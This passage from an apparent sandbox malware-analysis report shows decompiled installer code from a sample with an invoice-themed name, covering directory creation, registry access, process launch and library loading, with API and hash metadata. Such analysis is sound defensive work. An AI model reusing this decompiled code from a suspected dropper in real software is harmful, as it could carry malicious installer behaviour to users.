                                                                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                                                  							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040582C(_t42) == 0) {
                                                                                                  								goto L5;
                                                                                                  							} else {
                                                                                                  								_t25 = E00405792( *(_t36 + 8)); // executed
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_t25 != _t28) {
                                                                                                  							if(_t25 != 0xb7) {
                                                                                                  								L9:
                                                                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                  							} else {
                                                                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                  								if((_t26 & 0x00000010) == 0) {
                                                                                                  									goto L9;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						 *_t34 = _t31;
                                                                                                  						_t32 = _t34 + 2;
                                                                                                  					} while (_t31 != _t28);
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                                                  					_push(0xfffffff5);
                                                                                                  					E00401423();
                                                                                                  				} else {
                                                                                                  					E00401423(0xffffffe6);
                                                                                                  					E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated",  *(_t36 + 8));
                                                                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                  					if(_t23 == 0) {
                                                                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
                                                                                                  				return 0;
                                                                                                  			}












                                                                                                  APIs
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                    • Part of subcall function 00405792: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,?,00000000,000000F0), ref: 0040164D
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 00401640
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated
                                                                                                  • API String ID: 1892508949-3781222300
                                                                                                  • Opcode ID: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
                                                                                                  • Instruction ID: a664f1efeb726e69a6ab8af553608a028f51c0b4cf1c5e7724f5d8b0eae84205
                                                                                                  • Opcode Fuzzy Hash: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
                                                                                                  • Instruction Fuzzy Hash: 9311BE31504504EBCF317FA0CD4159F36A0EF15368B28493BEA45B22F2DB3E4D519A5E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E0040612D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                  				int _v8;
                                                                                                  				long _t21;
                                                                                                  				long _t24;
                                                                                                  				char* _t30;
                                                                                                  
                                                                                                  				asm("sbb eax, eax");
                                                                                                  				_v8 = 0x800;
                                                                                                  				_t21 = E004060CC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                  				_t30 = _a16;
                                                                                                  				if(_t21 != 0) {
                                                                                                  					L4:
                                                                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                                                                  				} else {
                                                                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                  					_t21 = RegCloseKey(_a20);
                                                                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                  						goto L4;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t21;
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
                                                                                                  • RegCloseKey.ADVAPI32(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseQueryValue
                                                                                                  • String ID: Call
                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                  • Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
                                                                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                  • Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405844(WCHAR* _a4) {
                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                  				int _t7;
                                                                                                  
                                                                                                  				0x7a4f28->cb = 0x44;
                                                                                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f28,  &_v20); // executed
                                                                                                  				if(_t7 != 0) {
                                                                                                  					CloseHandle(_v20.hThread);
                                                                                                  					return _v20.hProcess;
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040587A
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 00405857
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                  • Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
                                                                                                  • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                  • Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 60%
                                                                                                  			E0040202C(void* __ebx, void* __eflags) {
                                                                                                  				struct HINSTANCE__* _t23;
                                                                                                  				struct HINSTANCE__* _t31;
                                                                                                  				void* _t32;
                                                                                                  				void* _t34;
                                                                                                  				WCHAR* _t37;
                                                                                                  				intOrPtr* _t38;
                                                                                                  				void* _t39;
                                                                                                  
                                                                                                  				_t32 = __ebx;
                                                                                                  				asm("sbb eax, 0x7a8af8");
                                                                                                  				 *(_t39 - 4) = 1;
                                                                                                  				if(__eflags < 0) {
                                                                                                  					_push(0xffffffe7);
                                                                                                  					L15:
                                                                                                  					E00401423();
                                                                                                  					L16:
                                                                                                  					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t37 = E00402C37(0xfffffff0);
                                                                                                  				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37("true");
                                                                                                  				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                                                  					L3:
                                                                                                  					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                                                  					 *(_t39 + 8) = _t23;
                                                                                                  					if(_t23 == _t32) {
                                                                                                  						_push(0xfffffff6);
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  					L4:
                                                                                                  					_t38 = E004066A8( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                  					if(_t38 == _t32) {
                                                                                                  						E004052C3(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                  					} else {
                                                                                                  						 *(_t39 - 4) = _t32;
                                                                                                  						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                                                  							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
                                                                                                  						} else {
                                                                                                  							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                                                  							if( *_t38() != 0) {
                                                                                                  								 *(_t39 - 4) = 1;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E0040390D( *(_t39 + 8)) != 0) {
                                                                                                  						FreeLibrary( *(_t39 + 8)); // executed
                                                                                                  					}
                                                                                                  					goto L16;
                                                                                                  				}
                                                                                                  				_t31 = GetModuleHandleW(_t37); // executed
                                                                                                  				 *(_t39 + 8) = _t31;
                                                                                                  				if(_t31 != __ebx) {
                                                                                                  					goto L4;
                                                                                                  				}
                                                                                                  				goto L3;
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                    • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                                                                                    • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 334405425-0
                                                                                                  • Opcode ID: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
                                                                                                  • Instruction ID: 33d9dd4ae41202a81bff1c9b27653e69474f3e4813fbbe5d8a50aab7b73a9ae0
                                                                                                  • Opcode Fuzzy Hash: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
                                                                                                  • Instruction Fuzzy Hash: 1E21B371900208AACF20AFA5CE4CA9E7970AF05354F64813BF511B11E1DBBD4951DA5E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 59%
                                                                                                  			E00401B71(void* __ebx) {
                                                                                                  				intOrPtr _t8;
                                                                                                  				void* _t9;
                                                                                                  				void _t12;
                                                                                                  				void* _t14;
                                                                                                  				void* _t22;
                                                                                                  				void* _t25;
                                                                                                  				void* _t30;
                                                                                                  				void* _t33;
                                                                                                  				void* _t34;
                                                                                                  				char* _t36;
                                                                                                  				void* _t37;
                                                                                                  
                                                                                                  				_t28 = __ebx;
                                                                                                  				_t8 =  *((intOrPtr*)(_t37 - 0x20));
                                                                                                  				_t30 =  *0x40cdac; // 0xba3290
                                                                                                  				if(_t8 == __ebx) {
                                                                                                  					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
                                                                                                  						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                                                  						_t34 = _t9;
                                                                                                  						E00406281(__ebx, _t30, _t34, _t34 + 4,  *((intOrPtr*)(_t37 - 0x28)));
                                                                                                  						_t12 =  *0x40cdac; // 0xba3290
                                                                                                  						 *_t34 = _t12;
                                                                                                  						 *0x40cdac = _t34;
                                                                                                  					} else {
                                                                                                  						if(_t30 == __ebx) {
                                                                                                  							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                                  						} else {
                                                                                                  							_t3 = _t30 + 4; // 0xba3294
                                                                                                  							E0040625F(_t33, _t3);
                                                                                                  							_push(_t30);
                                                                                                  							 *0x40cdac =  *_t30;
                                                                                                  							GlobalFree();
                                                                                                  						}
                                                                                                  					}
                                                                                                  					goto L15;
                                                                                                  				} else {
                                                                                                  					while(1) {
                                                                                                  						_t8 = _t8 - 1;
                                                                                                  						if(_t30 == _t28) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_t30 =  *_t30;
                                                                                                  						if(_t8 != _t28) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							if(_t30 == _t28) {
                                                                                                  								break;
                                                                                                  							} else {
                                                                                                  								_t32 = _t30 + 4;
                                                                                                  								_t36 = L"Call";
                                                                                                  								E0040625F(_t36, _t30 + 4);
                                                                                                  								_t22 =  *0x40cdac; // 0xba3290
                                                                                                  								E0040625F(_t32, _t22 + 4);
                                                                                                  								_t25 =  *0x40cdac; // 0xba3290
                                                                                                  								_push(_t36);
                                                                                                  								_push(_t25 + 4);
                                                                                                  								E0040625F();
                                                                                                  								L15:
                                                                                                  								 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t37 - 4));
                                                                                                  								_t14 = 0;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  					_push(0x200010);
                                                                                                  					_push(E00406281(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                                                  					E004058C1();
                                                                                                  					_t14 = 0x7fffffff;
                                                                                                  				}
                                                                                                  				L17:
                                                                                                  				return _t14;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • GlobalFree.KERNEL32(00BA3290), ref: 00401BE1
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree
                                                                                                  • String ID: Call
                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                  • Opcode ID: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
                                                                                                  • Instruction ID: ff4179f111cc43373cd76ec1a10ab0793b80b0baf7d628909b63b00cde6b52bc
                                                                                                  • Opcode Fuzzy Hash: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
                                                                                                  • Instruction Fuzzy Hash: 5521AC72600100EFDB60FB94CE8895A76BAAF94328725413BF502F72D2DA7C98518F1D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 86%
                                                                                                  			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                                                  				void* _t9;
                                                                                                  				int _t10;
                                                                                                  				long _t13;
                                                                                                  				int* _t16;
                                                                                                  				intOrPtr _t21;
                                                                                                  				void* _t22;
                                                                                                  				short* _t24;
                                                                                                  				void* _t26;
                                                                                                  				void* _t29;
                                                                                                  
                                                                                                  				_t24 = __esi;
                                                                                                  				_t21 = __edx;
                                                                                                  				_t16 = __ebx;
                                                                                                  				_t9 = E00402C77(_t29, 0x20019); // executed
                                                                                                  				_t22 = _t9;
                                                                                                  				_t10 = E00402C15(3);
                                                                                                  				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                                                  				 *__esi = __ebx;
                                                                                                  				if(_t22 == __ebx) {
                                                                                                  					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                  				} else {
                                                                                                  					 *(_t26 + 8) = 0x3ff;
                                                                                                  					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                                                  						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                  						__eflags = _t13;
                                                                                                  						if(_t13 != 0) {
                                                                                                  							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                                                                                  					}
                                                                                                  					_t24[0x3ff] = _t16;
                                                                                                  					_push(_t22); // executed
                                                                                                  					RegCloseKey(); // executed
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                  				return 0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402538
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Enum$CloseValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 397863658-0
                                                                                                  • Opcode ID: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
                                                                                                  • Instruction ID: 18a2236d2da02041d188dcbd2d72052a2a953223b30961087eade96b9ec92dd4
                                                                                                  • Opcode Fuzzy Hash: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
                                                                                                  • Instruction Fuzzy Hash: 90017171904104AFE7159FA5DE89ABFB6B8EF45348F10403EF105A62D0DAB84E449B69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                                                  • GetLastError.KERNEL32 ref: 10002A62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFileLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1214770103-0
                                                                                                  • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                  • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                  • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                  • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 84%
                                                                                                  			E0040247E(int* __ebx, char* __esi) {
                                                                                                  				void* _t17;
                                                                                                  				short* _t18;
                                                                                                  				long _t21;
                                                                                                  				void* _t33;
                                                                                                  				void* _t37;
                                                                                                  				void* _t40;
                                                                                                  
                                                                                                  				_t35 = __esi;
                                                                                                  				_t27 = __ebx;
                                                                                                  				_t17 = E00402C77(_t40, 0x20019); // executed
                                                                                                  				_t33 = _t17;
                                                                                                  				_t18 = E00402C37(0x33);
                                                                                                  				 *__esi = __ebx;
                                                                                                  				if(_t33 == __ebx) {
                                                                                                  					 *(_t37 - 4) = 1;
                                                                                                  				} else {
                                                                                                  					 *(_t37 - 0x4c) = 0x800;
                                                                                                  					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c); // executed
                                                                                                  					if(_t21 != 0) {
                                                                                                  						L7:
                                                                                                  						 *_t35 = _t27;
                                                                                                  						 *(_t37 - 4) = 1;
                                                                                                  					} else {
                                                                                                  						if( *(_t37 + 8) == 4) {
                                                                                                  							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                  							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                  							E004061A6(__esi,  *__esi);
                                                                                                  						} else {
                                                                                                  							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                  								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                                                  								_t35[0x7fe] = _t27;
                                                                                                  							} else {
                                                                                                  								goto L7;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_push(_t33); // executed
                                                                                                  					RegCloseKey(); // executed
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t37 - 4);
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3356406503-0
                                                                                                  • Opcode ID: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
                                                                                                  • Instruction ID: 12a56d39eb772e04bf5da2f774c5f61affeaaf74f2150d0b0e53692ad729b11e
                                                                                                  • Opcode Fuzzy Hash: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
                                                                                                  • Instruction Fuzzy Hash: 0C117371914209EFEF24DFA4CA595BEB6B4EF05344F20843FE046A72C0D7B84A45DB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 69%
                                                                                                  			E00401389(signed int _a4) {
                                                                                                  				intOrPtr* _t6;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  				signed int _t11;
                                                                                                  				void* _t12;
                                                                                                  				signed int _t16;
                                                                                                  				signed int _t17;
                                                                                                  				void* _t18;
                                                                                                  
                                                                                                  				_t17 = _a4;
                                                                                                  				while(_t17 >= 0) {
                                                                                                  					_t6 = _t17 * 0x1c +  *0x7a8a70;
                                                                                                  					if( *_t6 == 1) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_push(_t6); // executed
                                                                                                  					_t8 = E00401434(); // executed
                                                                                                  					if(_t8 == 0x7fffffff) {
                                                                                                  						return 0x7fffffff;
                                                                                                  					}
                                                                                                  					_t10 = E0040136D(_t8);
                                                                                                  					if(_t10 != 0) {
                                                                                                  						_t11 = _t10 - 1;
                                                                                                  						_t16 = _t17;
                                                                                                  						_t17 = _t11;
                                                                                                  						_t12 = _t11 - _t16;
                                                                                                  					} else {
                                                                                                  						_t12 = _t10 + 1;
                                                                                                  						_t17 = _t17 + 1;
                                                                                                  					}
                                                                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                  						 *0x7a7a0c =  *0x7a7a0c + _t12;
                                                                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a0c, 0x7530,  *0x7a79f4), 0); // executed
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                  • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                  • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                  • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402388(void* __ebx) {
                                                                                                  				void* _t10;
                                                                                                  				void* _t14;
                                                                                                  				long _t18;
                                                                                                  				intOrPtr _t20;
                                                                                                  				void* _t22;
                                                                                                  				void* _t23;
                                                                                                  
                                                                                                  				_t14 = __ebx;
                                                                                                  				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                                                  				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                                                                                  				if( *(_t23 - 0x18) != __ebx) {
                                                                                                  					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
                                                                                                  					goto L4;
                                                                                                  				} else {
                                                                                                  					_t10 = E00402C77(_t26, 2); // executed
                                                                                                  					_t22 = _t10;
                                                                                                  					if(_t22 == __ebx) {
                                                                                                  						L6:
                                                                                                  						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                  					} else {
                                                                                                  						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
                                                                                                  						RegCloseKey(_t22);
                                                                                                  						L4:
                                                                                                  						if(_t18 != _t14) {
                                                                                                  							goto L6;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
                                                                                                  				return 0;
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023AA
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteValue
